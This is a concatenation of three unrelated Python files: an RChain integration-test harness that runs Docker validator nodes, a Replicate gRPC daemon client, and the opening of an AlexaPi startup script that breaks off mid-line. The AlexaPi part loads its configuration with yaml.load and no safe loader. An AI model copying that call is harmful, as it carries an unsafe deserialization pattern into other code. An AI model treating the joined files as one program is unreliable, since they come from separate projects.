from rchain.pb.DeployServiceCommon_pb2 import LightBlockInfo, BlockInfo
from rchain.crypto import PrivateKey
from rchain.certificate import get_node_id_raw
from rchain.const import DEFAULT_PHLO_LIMIT, DEFAULT_PHLO_PRICE
from cryptography.hazmat.primitives.serialization import load_pem_private_key
from cryptography.hazmat.backends import default_backend
from docker.client import DockerClient
from docker.models.containers import Container
from docker.models.containers import ExecResult

from .common import (
    make_tempdir,
    make_tempfile,
    TestingContext,
    NonZeroExitCodeError,
    GetBlockError,
    ParsingError,
    SynchronyConstraintError,
    NotAnActiveValidatorError,
    ValidatorNotContainsLatestMes,
)
from .wait import (
    wait_for_node_started,
    wait_for_approved_block_received_handler_state,
)
from .error import (
    RNodeAddressNotFoundError,
    CommandTimeoutError,
)
from .utils import (
    parse_mvdag_str,
    ISLINUX,
    get_free_tcp_port,
)

DEFAULT_IMAGE = os.environ.get("DEFAULT_IMAGE", "rchain-integration-tests:latest")

_PB_REPEATED_STR_SEP = "#$"

rnode_binary = '/opt/docker/bin/rnode'
rnode_directory = "/var/lib/rnode"
rnode_deploy_dir = "{}/deploy".format(rnode_directory)
rnode_bonds_file = '{}/genesis/bonds.txt'.format(rnode_directory)
rnode_wallets_file = '{}/genesis/wallets.txt'.format(rnode_directory)
rnode_certificate_path = '{}/node.certificate.pem'.format(rnode_directory)
rnode_key_path = '{}/node.key.pem'.format(rnode_directory)
rnode_logback_file = '{}/logback.xml'.format(rnode_directory)

rnode_default_launcher_args = [
    # We don't want the launcher script (generated by sbt-native-packager) to
    # swallow the first java error and exit with a confusing "No java
    # installation was detected" message.
'-no-version-check', ] rnode_default_client_options = [ # Make client calls on internal port which expose all APIs '--grpc-port=40402', ] default_http_port = 40403 default_internal_grpc_port = 40402 default_external_grpc_port = 40401 default_shard_id = 'test' @dataclass class PortMapping: http: int external_grpc: int internal_grpc: int class Node: def __init__(self, *, container: Container, deploy_dir: str, command_timeout: int, network: str, ports: Optional[PortMapping]) -> None: self.container = container self.local_deploy_dir = deploy_dir self.remote_deploy_dir = rnode_deploy_dir self.name = container.name self.command_timeout = command_timeout self.network = network self.terminate_background_logging_event = threading.Event() self.background_logging = LoggingThread( container=container, logger=logging.getLogger('peers'), terminate_thread_event=self.terminate_background_logging_event, ) self.background_logging.setDaemon(True) self.background_logging.start() self.ports = ports def __repr__(self) -> str: return '<Node(name={})>'.format(repr(self.name)) def get_node_pem_cert(self) -> bytes: return self.shell_out("cat", rnode_certificate_path).encode('utf8') def get_node_pem_key(self) -> bytes: return self.shell_out("cat", rnode_key_path).encode('utf8') def view_file(self, path: str) -> str: return self.shell_out("cat", path) def get_node_id_raw(self) -> bytes: key = load_pem_private_key(self.get_node_pem_key(), None, default_backend()) return get_node_id_raw(key) def logs(self) -> str: return self.container.logs().decode('utf-8') def get_rnode_address(self) -> str: log_content = self.logs() regex = "Listening for traffic on (rnode://.+@{name}\\?protocol=\\d+&discovery=\\d+)\\.$"\ .format(name=self.container.name) match = re.search(regex, log_content, re.MULTILINE | re.DOTALL) if match is None: raise RNodeAddressNotFoundError(regex) address = match.group(1) return address def get_metrics(self) -> str: resp = requests.get("http://{}:{}/metrics".format(self.get_self_host(), self.get_http_port())) return resp.content.decode('utf8') def get_connected_peers_metric_value(self) -> str: try: resp = requests.get("http://{}:{}/metrics".format(self.get_self_host(), self.get_http_port())) result = '' for line in resp.content.decode('utf8').splitlines(): if line.startswith("rchain_comm_rp_connect_peers"): result = line break return result except NonZeroExitCodeError as e: if e.exit_code == 1: return '' raise def get_peer_node_ip(self, network_name: str) -> str: self.container.reload() network_config = self.container.attrs['NetworkSettings']['Networks'][network_name] assert network_config is not None return network_config['IPAddress'] def get_self_host(self) -> str: if ISLINUX: return self.get_peer_node_ip(self.network) return 'localhost' def get_http_port(self) -> int: if ISLINUX: return default_http_port assert self.ports return self.ports.http def get_external_grpc_port(self) -> int: if ISLINUX: return default_external_grpc_port assert self.ports return self.ports.external_grpc def get_internal_grpc_port(self) -> int: if ISLINUX: return default_internal_grpc_port assert self.ports return self.ports.internal_grpc def cleanup(self) -> None: self.container.remove(force=True, v=True) self.terminate_background_logging_event.set() self.background_logging.join() def get_blocks_count(self, depth: int) -> int: show_blocks = self.get_blocks(depth) return len(show_blocks) def get_blocks(self, depth: int) -> List[LightBlockInfo]: with RClient(self.get_self_host(), self.get_external_grpc_port()) as client: return 
client.show_blocks(depth) def get_block(self, hash: str) -> BlockInfo: with RClient(self.get_self_host(), self.get_external_grpc_port()) as client: try: return client.show_block(hash) except RClientException as e: message = e.args[0] raise GetBlockError(('show-block',), 1, message) from e # Too low level -- do not use directly. Prefer shell_out() instead. def _exec_run_with_timeout(self, cmd: Tuple[str, ...], stderr: bool = True) -> Tuple[int, str]: control_queue: queue.Queue = Queue(1) def command_process() -> None: exec_result: ExecResult = self.container.exec_run(cmd, stderr=stderr) control_queue.put((exec_result.exit_code, exec_result.output.decode('utf-8'))) process = Process(target=command_process) logging.info("COMMAND {} {}".format(self.name, cmd)) process.start() try: exit_code, output = control_queue.get(True, self.command_timeout) except queue.Empty as e: raise CommandTimeoutError(cmd, self.command_timeout) from e finally: process.terminate() if exit_code != 0: for line in output.splitlines(): logging.info('{}: {}'.format(self.name, line)) logging.warning("EXITED {} {} {}".format(self.name, cmd, exit_code)) else: for line in output.splitlines(): logging.debug('{}: {}'.format(self.name, line)) logging.debug("EXITED {} {} {}".format(self.name, cmd, exit_code)) return exit_code, output def shell_out(self, *cmd: str, stderr: bool = True) -> str: exit_code, output = self._exec_run_with_timeout(cmd, stderr=stderr) if exit_code != 0: raise NonZeroExitCodeError(command=cmd, exit_code=exit_code, output=output) return output def rnode_command(self, *node_args: str, stderr: bool = True) -> str: return self.shell_out(rnode_binary, *rnode_default_client_options, *rnode_default_launcher_args, *node_args, stderr=stderr) def eval(self, rho_file_path: str) -> str: return self.rnode_command('eval', rho_file_path) def deploy(self, rho_file_path: str, private_key: PrivateKey, phlo_limit:int = DEFAULT_PHLO_LIMIT, phlo_price: int = DEFAULT_PHLO_PRICE, valid_after_block_no:int=0, shard_id: str = default_shard_id) -> str: try: now_time = int(time.time()*1000) with RClient(self.get_self_host(), self.get_external_grpc_port()) as client: return client.deploy(private_key, self.view_file(rho_file_path), phlo_price, phlo_limit, valid_after_block_no, now_time, shard_id=shard_id) except RClientException as e: message = e.args[0] if "Parsing error" in message: raise ParsingError(command=("propose", ), exit_code=1, output=message) from e # TODO out of phlogiston error raise e def get_vdag(self) -> str: return self.rnode_command('vdag', stderr=False) def get_mvdag(self) -> str: return self.rnode_command('mvdag', stderr=False) def get_parsed_mvdag(self) -> Dict[str, Set[str]]: return parse_mvdag_str(self.get_mvdag()) def deploy_string(self, rholang_code: str, private_key: PrivateKey, phlo_limit:int = DEFAULT_PHLO_LIMIT, phlo_price: int = DEFAULT_PHLO_PRICE, valid_after_block_no:int = 0) -> str: try: now_time = int(time.time()*1000) with RClient(self.get_self_host(), self.get_external_grpc_port()) as client: return client.deploy(private_key, rholang_code, phlo_price, phlo_limit, valid_after_block_no, now_time) except RClientException as e: message = e.args[0] if "Parsing error" in message: raise ParsingError(command=("propose", ), exit_code=1, output=message) from e # TODO out of phlogiston error raise e def find_deploy(self, deploy_id: str) -> LightBlockInfo: with RClient(self.get_self_host(), self.get_external_grpc_port()) as client: return client.find_deploy(deploy_id) def propose(self) -> str: try: with 
RClient(self.get_self_host(), self.get_internal_grpc_port()) as client: return client.propose() except RClientException as e: message = e.args[0] if "Must wait for more blocks from other validators" in message: raise SynchronyConstraintError(command=('propose',), exit_code=1, output=message) from e if "ReadOnlyMode" in message: raise NotAnActiveValidatorError(command=('propose',), exit_code=1, output=message) from e if "Validator does not have a latest message" in message: raise ValidatorNotContainsLatestMes(command=('propose',), exit_code=1, output=message) from e raise e def last_finalized_block(self) -> BlockInfo: with RClient(self.get_self_host(), self.get_external_grpc_port()) as client: return client.last_finalized_block() def repl(self, rholang_code: str, stderr: bool = False) -> str: quoted_rholang_code = shlex.quote(rholang_code) output = self.shell_out( 'sh', '-c', 'echo {quoted_rholang_code} | {rnode_binary} {rnode_default_client_options} repl' .format(quoted_rholang_code=quoted_rholang_code,rnode_binary=rnode_binary, rnode_default_client_options=" ".join(rnode_default_client_options)), stderr=stderr, ) return output def cat_forward_file(self, public_key: str) -> str: return self.shell_out('cat', '/opt/docker/forward_{}.rho'.format(public_key)) def cat_bond_file(self, public_key: str) -> str: return self.shell_out('cat', '/opt/docker/bond_{}.rho'.format(public_key)) __timestamp_rx = "\\d\\d:\\d\\d:\\d\\d\\.\\d\\d\\d" __log_message_rx = re.compile("^{timestamp_rx} (.*?)(?={timestamp_rx})" .format(timestamp_rx=__timestamp_rx), re.MULTILINE | re.DOTALL) def log_lines(self) -> List[str]: log_content = self.logs() return Node.__log_message_rx.split(log_content) def deploy_contract_with_substitution(self, substitute_dict: Dict[str, str], rho_file_path: str, private_key: PrivateKey, phlo_limit:int = DEFAULT_PHLO_LIMIT, phlo_price: int = DEFAULT_PHLO_PRICE, shard_id: str = default_shard_id) -> str: """ Supposed that you have a contract with content like below. 
new x in { x!("#DATA") } If you pass a dict {'#DATA': "123456"} as substitute_dict args in this func, this method would substitute the string #DATA in the contract with 123456, which turns out to be new x in { x!("123456") } And then deploy the contract in the node """ shutil.copyfile(rho_file_path, os.path.join(self.local_deploy_dir, os.path.basename(rho_file_path))) container_contract_file_path = os.path.join(self.remote_deploy_dir, os.path.basename(rho_file_path)) substitute_rules = ';'.join([r's/{}/{}/g'.format(key.replace(r'/', r'\/'), value.replace(r'/', r'\/')) for key, value in substitute_dict.items()]) self.shell_out( 'sed', '-i', '-e', substitute_rules, container_contract_file_path, ) self.deploy(container_contract_file_path, private_key, phlo_limit, phlo_price, shard_id=shard_id) block_hash = self.propose() return block_hash class LoggingThread(threading.Thread): def __init__(self, terminate_thread_event: Event, container: Container, logger: Logger) -> None: super().__init__() self.terminate_thread_event = terminate_thread_event self.container = container self.logger = logger def run(self) -> None: containers_log_lines_generator = self.container.logs(stream=True, follow=True) try: while True: if self.terminate_thread_event.is_set(): break line = next(containers_log_lines_generator) self.logger.info('{:>11}: {}'.format(self.container.name[-11:], line.decode('utf-8').rstrip())) except StopIteration: pass class DeployThread(threading.Thread): def __init__(self, name: str, node: Node, contract: str, count: int, private_key: PrivateKey) -> None: threading.Thread.__init__(self) self.name = name self.node = node self.contract = contract self.count = count self.private_key = private_key def run(self) -> None: for _ in range(self.count): self.node.deploy(self.contract, self.private_key) self.node.propose() def make_container_command(container_command: str, container_command_flags: AbstractSet, container_command_options: Dict) -> str: opts = ['{}={}'.format(option, argument) for option, argument in container_command_options.items()] flags = ' '.join(container_command_flags) result = '{} {} {}'.format(container_command, flags, ' '.join(opts)) return result def make_node( # pylint: disable=too-many-locals *, docker_client: DockerClient, name: str, network: str, bonds_file: str, container_command: str, container_command_flags: AbstractSet, container_command_options: Dict, command_timeout: int, extra_volumes: Optional[List[str]], allowed_peers: Optional[List[str]], image: str = DEFAULT_IMAGE, mem_limit: Optional[str] = None, wallets_file: Optional[str] = None, ) -> Node: assert isinstance(name, str) assert '_' not in name, 'Underscore is not allowed in host name' deploy_dir = make_tempdir("rchain-integration-test") hosts_allow_file_content = \ "ALL:ALL" if allowed_peers is None else "\n".join("ALL: {}".format(peer) for peer in allowed_peers) hosts_allow_file = make_tempfile("hosts-allow-{}".format(name), hosts_allow_file_content) hosts_deny_file = make_tempfile("hosts-deny-{}".format(name), "ALL: ALL") container_command_options["-Dlogback.configurationFile"] = rnode_logback_file command = make_container_command(container_command, container_command_flags, container_command_options) env = {} java_options = os.environ.get('_JAVA_OPTIONS') if java_options is not None: env['_JAVA_OPTIONS'] = java_options logging.debug('Using _JAVA_OPTIONS: {}'.format(java_options)) volumes = [ "{}:/etc/hosts.allow".format(hosts_allow_file), "{}:/etc/hosts.deny".format(hosts_deny_file), "{}:{}".format(bonds_file, 
rnode_bonds_file), "{}:{}".format(deploy_dir, rnode_deploy_dir), "{}:{}".format(os.path.abspath("resources/logback.xml"), rnode_logback_file) ] if wallets_file is not None: volumes.append('{}:{}'.format(wallets_file, rnode_wallets_file)) if extra_volumes: all_volumes = volumes + extra_volumes else: all_volumes = volumes if ISLINUX: ports = None port_map = None else: port_map = PortMapping(http=get_free_tcp_port(), external_grpc=get_free_tcp_port(), internal_grpc=get_free_tcp_port()) ports = {default_http_port: port_map.http, default_external_grpc_port: port_map.external_grpc, default_internal_grpc_port: port_map.internal_grpc} logging.info('STARTING %s %s', name, command) container = docker_client.containers.run( image, name=name, user='root', detach=True, mem_limit=mem_limit, network=network, volumes=all_volumes, command=command, hostname=name, environment=env, ports=ports ) node = Node( container=container, deploy_dir=deploy_dir, command_timeout=command_timeout, network=network, ports=port_map ) return node def make_bootstrap_node( *, docker_client: DockerClient, network: str, bonds_file: str, private_key: PrivateKey, command_timeout: int, allowed_peers: Optional[List[str]] = None, mem_limit: Optional[str] = None, cli_flags: Optional[AbstractSet] = None, cli_options: Optional[Dict] = None, wallets_file: Optional[str] = None, extra_volumes: Optional[List[str]] = None, synchrony_constraint_threshold: float = 0.0, max_peer_queue_size: int = 10, give_up_after_skipped: int = 0, drop_peer_after_retries: int = 0, number_of_active_validators: int = 10, epoch_length: int = 10000, quarantine_length: int = 50000, min_phlo_price: int = 1, shard_id: str = default_shard_id ) -> Node: container_name = make_bootstrap_name(network) container_command_flags = set([ *rnode_default_launcher_args, "--standalone", "--prometheus", "--no-upnp", "--allow-private-addresses" ]) container_command_options = { "--protocol-port": 40400, "--validator-private-key": private_key.to_hex(), "--validator-public-key": private_key.get_public_key().to_hex(), "--host": container_name, "--synchrony-constraint-threshold": synchrony_constraint_threshold, "--frrd-max-peer-queue-size": max_peer_queue_size, "--frrd-give-up-after-skipped": give_up_after_skipped, "--frrd-drop-peer-after-retries": drop_peer_after_retries, "--number-of-active-validators": number_of_active_validators, "--epoch-length": epoch_length, "--quarantine-length": quarantine_length, "--min-phlo-price": min_phlo_price, "--shard-name": shard_id } if cli_flags is not None: container_command_flags.update(cli_flags) if cli_options is not None: container_command_options.update(cli_options) container = make_node( docker_client=docker_client, name=container_name, network=network, bonds_file=bonds_file, container_command='run', container_command_flags=container_command_flags, container_command_options=container_command_options, command_timeout=command_timeout, extra_volumes=extra_volumes, allowed_peers=allowed_peers, mem_limit=mem_limit if mem_limit is not None else '4G', wallets_file=wallets_file, ) return container def make_container_name(network_name: str, name: str) -> str: return "{network_name}.{name}".format(network_name=network_name, name=name) def make_bootstrap_name(network_name: str) -> str: return make_container_name(network_name=network_name, name='bootstrap') def make_peer_name(network_name: str, name: str) -> str: if name.isdigit(): actual_name = 'peer{}'.format(name) else: actual_name = name return make_container_name(network_name=network_name, 
name=actual_name)


def make_peer(
        *,
        docker_client: DockerClient,
        network: str,
        name: str,
        bonds_file: str,
        command_timeout: int,
        bootstrap: Node,
        private_key: PrivateKey,
        allowed_peers: Optional[List[str]] = None,
        mem_limit: Optional[str] = None,
        wallets_file: Optional[str] = None,
        cli_flags: Optional[AbstractSet] = None,
        cli_options: Optional[Dict] = None,
        extra_volumes: Optional[List[str]] = None,
        synchrony_constraint_threshold: float = 0.0,
        max_peer_queue_size: int = 10,
        give_up_after_skipped: int = 0,
        drop_peer_after_retries: int = 0,
        number_of_active_validators: int = 10,
        epoch_length: int = 10000,
        quarantine_length: int = 50000,
        shard_id: str = default_shard_id
) -> Node:
    assert isinstance(name, str)
    assert '_' not in name, 'Underscore is not allowed in host name'
    name = make_peer_name(network, name)
    bootstrap_address = bootstrap.get_rnode_address()

    container_command_flags = set([
        "--prometheus",
        "--no-upnp",
        "--allow-private-addresses"
    ])
    if cli_flags is not None:
        container_command_flags.update(cli_flags)

    container_command_options = {
        "--bootstrap": bootstrap_address,
        "--validator-private-key": private_key.to_hex(),
        "--validator-public-key": private_key.get_public_key().to_hex(),
        "--host": name,
        "--synchrony-constraint-threshold": synchrony_constraint_threshold,
        "--frrd-max-peer-queue-size": max_peer_queue_size,
        "--frrd-give-up-after-skipped": give_up_after_skipped,
        "--frrd-drop-peer-after-retries": drop_peer_after_retries,
        "--number-of-active-validators": number_of_active_validators,
        "--epoch-length": epoch_length,
        "--quarantine-length": quarantine_length,
        "--shard-name": shard_id
    }
    if cli_options is not None:
        container_command_options.update(cli_options)

    container = make_node(
        docker_client=docker_client,
        name=name,
        network=network,
        bonds_file=bonds_file,
        container_command='run',
        container_command_flags=container_command_flags,
        container_command_options=container_command_options,
        command_timeout=command_timeout,
        extra_volumes=extra_volumes,
        allowed_peers=allowed_peers,
        # fall back to a 4G limit when none is given, as make_bootstrap_node does
        mem_limit=mem_limit if mem_limit is not None else '4G',
        wallets_file=wallets_file,
    )
    return container


@contextlib.contextmanager
def started_peer(
        *,
        context: TestingContext,
        network: str,
        name: str,
        bootstrap: Node,
        private_key: PrivateKey,
        cli_flags: Optional[AbstractSet] = None,
        cli_options: Optional[Dict] = None,
        extra_volumes: Optional[List[str]] = None,
        synchrony_constraint_threshold: float = 0.0,
        epoch_length: int = 10000,
        quarantine_length: int = 50000,
        shard_id: str = default_shard_id
) -> Generator[Node, None, None]:
    peer = make_peer(
        docker_client=context.docker,
        network=network,
        name=name,
        bonds_file=context.bonds_file,
        bootstrap=bootstrap,
        private_key=private_key,
        command_timeout=context.command_timeout,
        wallets_file=context.wallets_file,
        cli_flags=cli_flags,
        cli_options=cli_options,
        extra_volumes=extra_volumes,
        synchrony_constraint_threshold=synchrony_constraint_threshold,
        epoch_length=epoch_length,
        quarantine_length=quarantine_length,
        shard_id=shard_id
    )
    try:
        wait_for_node_started(context, peer)
        yield peer
    finally:
        peer.cleanup()


@contextlib.contextmanager
def bootstrap_connected_peer(
        *,
        context: TestingContext,
        bootstrap: Node,
        name: str,
        private_key: PrivateKey,
        cli_options: Optional[Dict[str, str]] = None,
        synchrony_constraint_threshold: float = 0.0,
        epoch_length: int = 10000,
        quarantine_length: int = 50000,
        shard_id: str = default_shard_id
) -> Generator[Node, None, None]:
    with started_peer(
        context=context,
        network=bootstrap.network,
        name=name,
        bootstrap=bootstrap,
        private_key=private_key,
cli_options=cli_options, synchrony_constraint_threshold=synchrony_constraint_threshold, epoch_length=epoch_length, quarantine_length=quarantine_length, shard_id=shard_id ) as peer: wait_for_approved_block_received_handler_state(context, peer) yield peer def make_random_network_name(context: TestingContext, length: int) -> str: return ''.join(context.random_generator.choice(string.ascii_lowercase) for m in range(length)) @contextlib.contextmanager def docker_network(context: TestingContext, docker_client: DockerClient) -> Generator[str, None, None]: network_name = "rchain-{}".format(make_random_network_name(context, 5)) docker_client.networks.create(network_name, driver="bridge") try: yield network_name finally: for network in docker_client.networks.list(): if network_name == network.name: network.remove() @contextlib.contextmanager def started_bootstrap( *, context: TestingContext, network: str, cli_flags: Optional[AbstractSet] = None, cli_options: Optional[Dict[str, str]] = None, extra_volumes: Optional[List[str]] = None, synchrony_constraint_threshold: float = 0.0, epoch_length: int = 10000, quarantine_length: int = 50000, min_phlo_price: int = 1, shard_id: str = default_shard_id ) -> Generator[Node, None, None]: bootstrap_node = make_bootstrap_node( docker_client=context.docker, network=network, bonds_file=context.bonds_file, private_key=context.bootstrap_key, command_timeout=context.command_timeout, cli_flags=cli_flags, cli_options=cli_options, wallets_file=context.wallets_file, extra_volumes=extra_volumes, synchrony_constraint_threshold=synchrony_constraint_threshold, epoch_length=epoch_length, quarantine_length=quarantine_length, min_phlo_price=min_phlo_price, shard_id=shard_id ) try: wait_for_node_started(context, bootstrap_node) yield bootstrap_node finally: bootstrap_node.cleanup() @contextlib.contextmanager def started_bootstrap_with_network( context: TestingContext, cli_flags: Optional[AbstractSet] = None, cli_options: Optional[Dict] = None, synchrony_constraint_threshold: float = 0.0, epoch_length: int = 10000, quarantine_length: int = 50000, min_phlo_price: int = 1, shard_id: str = default_shard_id, extra_volumes: Optional[List[str]] = None, wait_for_approved_block: bool = False, ) -> Generator[Node, None, None]: with docker_network(context, context.docker) as network: with started_bootstrap( context=context, network=network, cli_flags=cli_flags, cli_options=cli_options, synchrony_constraint_threshold=synchrony_constraint_threshold, extra_volumes=extra_volumes, epoch_length=epoch_length, quarantine_length=quarantine_length, min_phlo_price=min_phlo_price, shard_id=shard_id ) as bootstrap: if wait_for_approved_block: wait_for_approved_block_received_handler_state(context, bootstrap) yield bootstrap ready_bootstrap_with_network = functools.partial(started_bootstrap_with_network, wait_for_approved_block=True)
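# A hedged usage sketch of the context managers above (the test body is
# illustrative only; `context` is the TestingContext fixture from .common, and
# reusing the bootstrap key for the peer is just for brevity):
#
#     def example_two_node_test(context):
#         with started_bootstrap_with_network(context) as bootstrap:
#             with bootstrap_connected_peer(
#                     context=context,
#                     bootstrap=bootstrap,
#                     name='0',
#                     private_key=context.bootstrap_key,
#             ) as peer:
#                 peer.deploy_string('new x in { x!(1) }', context.bootstrap_key)
#                 peer.propose()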
daemon.py
# TODO: docstring # TODO: rename to shared? import functools import tempfile import os from typing import Optional, Dict, Any, List import subprocess import atexit import sys import threading import grpc # type: ignore from google.rpc import status_pb2, error_details_pb2 # type: ignore from .servicepb.replicate_pb2_grpc import DaemonStub from .servicepb import replicate_pb2 as pb from . import pb_convert from .experiment import Experiment from .checkpoint import Checkpoint, PrimaryMetric from . import exceptions from . import console # TODO(andreas): rename to replicate-daemon DAEMON_BINARY = os.path.join(os.path.dirname(__file__), "bin/replicate-shared") def handle_error(f): @functools.wraps(f) def wrapped(*args, **kwargs): try: return f(*args, **kwargs) except grpc.RpcError as e: code, name = e.code().value details = e.details() if name == "internal": status_code = get_status_code(e, details) if status_code: raise handle_exception(status_code, details) raise Exception(details) return wrapped def handle_exception(code, details): if code == "DOES_NOT_EXIST": return exceptions.DoesNotExist(details) if code == "READ_ERROR": return exceptions.ReadError(details) if code == "WRITE_ERROR": return exceptions.WriteError(details) if code == "REPOSITORY_CONFIGURATION_ERROR": return exceptions.RepositoryConfigurationError(details) if code == "INCOMPATIBLE_REPOSITORY_VERSION": return exceptions.IncompatibleRepositoryVersion(details) if code == "CORRUPTED_REPOSITORY_SPEC": return exceptions.CorruptedRepositorySpec(details) if code == "CONFIG_NOT_FOUND": return exceptions.ConfigNotFound(details) def get_status_code(e, details): metadata = e.trailing_metadata() status_md = [x for x in metadata if is_status_detail(x)] if status_md: for md in status_md: st = status_pb2.Status() st.MergeFromString(md.value) if st.details: val = error_details_pb2.ErrorInfo() st.details[0].Unpack(val) return val.reason return None def is_status_detail(x): return hasattr(x, "key") and x.key == "grpc-status-details-bin" class Daemon: def __init__(self, project, socket_path=None, debug=False): self.project = project if socket_path is None: # create a new temporary file just to get a free name. # the Go GRPC server will create the file. f = tempfile.NamedTemporaryFile( prefix="replicate-daemon-", suffix=".sock", delete=False ) self.socket_path = f.name f.close() else: self.socket_path = socket_path # the Go GRPC server will fail to start if the socket file # already exists. os.unlink(self.socket_path) cmd = [DAEMON_BINARY] if self.project.repository: cmd += ["-R", self.project.repository] if self.project.directory: cmd += ["-D", self.project.directory] if debug: cmd += ["-v"] cmd.append(self.socket_path) self.process = subprocess.Popen( cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE ) # need to wrap stdout and stderr for this to work in jupyter # notebooks. jupyter redefines sys.std{out,err} as custom # writers that eventually write the output to the notebook. 
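        # Forward each daemon pipe on its own reader thread so output reaches
        # the (possibly redefined) Python streams without this process blocking
        # on a full OS pipe buffer.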
self.stdout_thread = start_wrapped_pipe(self.process.stdout, sys.stdout) self.stderr_thread = start_wrapped_pipe(self.process.stderr, sys.stderr) atexit.register(self.cleanup) self.channel = grpc.insecure_channel("unix://" + self.socket_path) self.stub = DaemonStub(self.channel) TIMEOUT_SEC = 15 grpc.channel_ready_future(self.channel).result(timeout=TIMEOUT_SEC) # TODO(andreas): catch daemon dying (bubble up an exception so we can fail on experiment.init()) def cleanup(self): if self.process.poll() is None: # check if process is still running: # the sigterm handler in the daemon process waits for any in-progress uploads etc. to finish. # the sigterm handler also deletes the socket file self.process.terminate() self.process.wait() # need to join these threads to avoid "could not acquire lock" error self.stdout_thread.join() self.stderr_thread.join() self.channel.close() @handle_error def create_experiment( self, path: Optional[str], params: Optional[Dict[str, Any]], command: Optional[str], python_packages: Dict[str, str], python_version: str, quiet: bool, disable_hearbeat: bool, ) -> Experiment: pb_experiment = pb.Experiment( params=pb_convert.value_map_to_pb(params), path=path, command=command, pythonPackages=python_packages, pythonVersion=python_version, ) ret = self.stub.CreateExperiment( pb.CreateExperimentRequest( experiment=pb_experiment, disableHeartbeat=disable_hearbeat, quiet=quiet, ), ) return pb_convert.experiment_from_pb(self.project, ret.experiment) @handle_error def create_checkpoint( self, experiment: Experiment, path: Optional[str], step: Optional[int], metrics: Optional[Dict[str, Any]], primary_metric: Optional[PrimaryMetric], quiet: bool, ) -> Checkpoint: pb_primary_metric = pb_convert.primary_metric_to_pb(primary_metric) pb_checkpoint = pb.Checkpoint( metrics=pb_convert.value_map_to_pb(metrics), path=path, primaryMetric=pb_primary_metric, step=step, ) ret = self.stub.CreateCheckpoint( pb.CreateCheckpointRequest(checkpoint=pb_checkpoint, quiet=quiet) ) return pb_convert.checkpoint_from_pb(experiment, ret.checkpoint) @handle_error def save_experiment( self, experiment: Experiment, quiet: bool, ): pb_experiment = pb_convert.experiment_to_pb(experiment) return self.stub.SaveExperiment( pb.SaveExperimentRequest(experiment=pb_experiment, quiet=quiet) ) @handle_error def stop_experiment(self, experiment_id: str): self.stub.StopExperiment(pb.StopExperimentRequest(experimentID=experiment_id)) @handle_error def get_experiment(self, experiment_id_prefix: str) -> Experiment: ret = self.stub.GetExperiment( pb.GetExperimentRequest(experimentIDPrefix=experiment_id_prefix), ) return pb_convert.experiment_from_pb(self.project, ret.experiment) @handle_error def list_experiments(self) -> List[Experiment]: ret = self.stub.ListExperiments(pb.ListExperimentsRequest()) return pb_convert.experiments_from_pb(self.project, ret.experiments) @handle_error def delete_experiment(self, experiment_id: str): self.stub.DeleteExperiment( pb.DeleteExperimentRequest(experimentID=experiment_id) ) @handle_error def checkout_checkpoint( self, checkpoint_id_prefix: str, output_directory: str, quiet: bool ): self.stub.CheckoutCheckpoint( pb.CheckoutCheckpointRequest( checkpointIDPrefix=checkpoint_id_prefix, outputDirectory=output_directory, quiet=quiet, ), ) @handle_error def experiment_is_running(self, experiment_id: str) -> str: ret = self.stub.GetExperimentStatus( pb.GetExperimentStatusRequest(experimentID=experiment_id) ) return ret.status == pb.GetExperimentStatusReply.Status.RUNNING def 
start_wrapped_pipe(pipe, writer):
    def wrap_pipe(pipe, writer):
        with pipe:
            for line in iter(pipe.readline, b""):
                writer.write(line)
                writer.flush()

    # if writer is normal sys.std{out,err}, it can't
    # write bytes directly.
    # see https://stackoverflow.com/a/908440/135797
    if hasattr(writer, "buffer"):
        writer = writer.buffer

    thread = threading.Thread(target=wrap_pipe, args=[pipe, writer], daemon=True)
    thread.start()
    return thread
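# A hedged usage sketch of the Daemon lifecycle above (the project object and
# its attribute values are assumptions based on how Daemon reads them):
#
#     class _FakeProject:
#         repository = None  # e.g. a repository URL in a real setup
#         directory = None
#
#     daemon = Daemon(_FakeProject(), debug=True)
#     try:
#         experiments = daemon.list_experiments()
#     finally:
#         # terminates the Go subprocess and joins the pipe-reader threads
#         daemon.cleanup()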
main.py
#! /usr/bin/env python import importlib import os import logging import tempfile import signal import shutil import time import sys import threading import json import optparse import email import subprocess from future.builtins import bytes import yaml import requests import coloredlogs import alexapi.config import alexapi.tunein as tunein import alexapi.capture import alexapi.triggers as triggers from alexapi.exceptions import ConfigurationException from alexapi.constants import RequestType, PlayerActivity logging.basicConfig(format='%(asctime)s %(levelname)s: %(message)s') coloredlogs.DEFAULT_FIELD_STYLES = { 'hostname': {'color': 'magenta'}, 'programname': {'color': 'cyan'}, 'name': {'color': 'blue'}, 'levelname': {'color': 'magenta', 'bold': True}, 'asctime': {'color': 'green'} } coloredlogs.DEFAULT_LEVEL_STYLES = { 'info': {'color': 'blue'}, 'critical': {'color': 'red', 'bold': True}, 'error': {'color': 'red'}, 'debug': {'color': 'green'}, 'warning': {'color': 'yellow'} } # Get arguments parser = optparse.OptionParser() parser.add_option('-s', '--silent', dest="silent", action="store_true", default=False, help="start without saying hello") parser.add_option('-d', '--debug', dest="debug", action="store_true", default=False, help="display debug messages") parser.add_option('--daemon', dest="daemon", action="store_true", default=False, help="Used by initd/systemd start script to reconfigure logging") cmdopts, cmdargs = parser.parse_args() silent = cmdopts.silent debug = cmdopts.debug config_exists = alexapi.config.filename is not None if config_exists: with open(alexapi.config.filename, 'r') as stream: config = yaml.load(stream) if debug: log_level = logging.DEBUG else: if config_exists: log_level = logging.getLevelName(config.get('logging', 'INFO').upper()) else: log_level = logging.getLevelName('INFO') if cmdopts.daemon: coloredlogs.DEFAULT_LOG_FORMAT = '%(levelname)s: %(message)s' else: coloredlogs.DEFAULT_LOG_FORMAT = '%(asctime)s %(levelname)s: %(message)s' coloredlogs.install(level=log_level) alexa_logger = logging.getLogger('alexapi') alexa_logger.setLevel(log_level) logger = logging.getLogger(__name__) if not config_exists: logger.critical('Can not find configuration file. Exiting...') sys.exit(1) # Setup event commands event_commands = { 'startup': "", 'pre_interaction': "", 'post_interaction': "", 'shutdown': "", } if 'event_commands' in config: event_commands.update(config['event_commands']) im = importlib.import_module('alexapi.device_platforms.' 
